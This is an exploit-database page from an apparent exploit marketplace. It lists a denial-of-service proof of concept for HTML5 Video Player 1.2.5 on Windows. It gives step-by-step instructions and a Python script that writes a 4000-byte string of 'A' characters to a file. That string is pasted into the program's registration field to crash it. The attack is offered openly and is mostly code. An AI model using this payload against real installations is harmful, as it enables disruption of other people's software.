[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

HTML5 Video Player 1.2.5 - Denial of Service Exploit

Author
T3jv1l
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-31075
Category
dos / poc
Date add
11-09-2018
Platform
windows
# Exploit Title: HTML5 Video Player 1.2.5 - Denial of Service (PoC)
# Exploit Author: T3jv1l
# Vendor Homepage: http://www.html5videoplayer.net/download.html
# Software: http://www.html5videoplayer.net/html5videoplayer-setup.exe
# Contact: https://twitter.com/T3jv1l
# Version: HTML5 Video Player V.1.2.5
# Tested on: Windows 7 SP1 x86
 
# PoC:
# 1.  Download and install the setup file
# 2.  A file "Evil.txt" will be created
# 3.  Click Help > Register... in tool bar
# 4.  Copy the contents of the file (poc.txt) and paste in the Registration Name field 
# 5.  Click Activate and BOOMMMM !!!! 
 
#!/usr/bin/python
 
buffer = "\x41" * 4000
payload = buffer
try:
    f=open("poc.txt","w")
    print "[+] Creating %s bytes payload..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

#  0day.today [2024-07-02]  #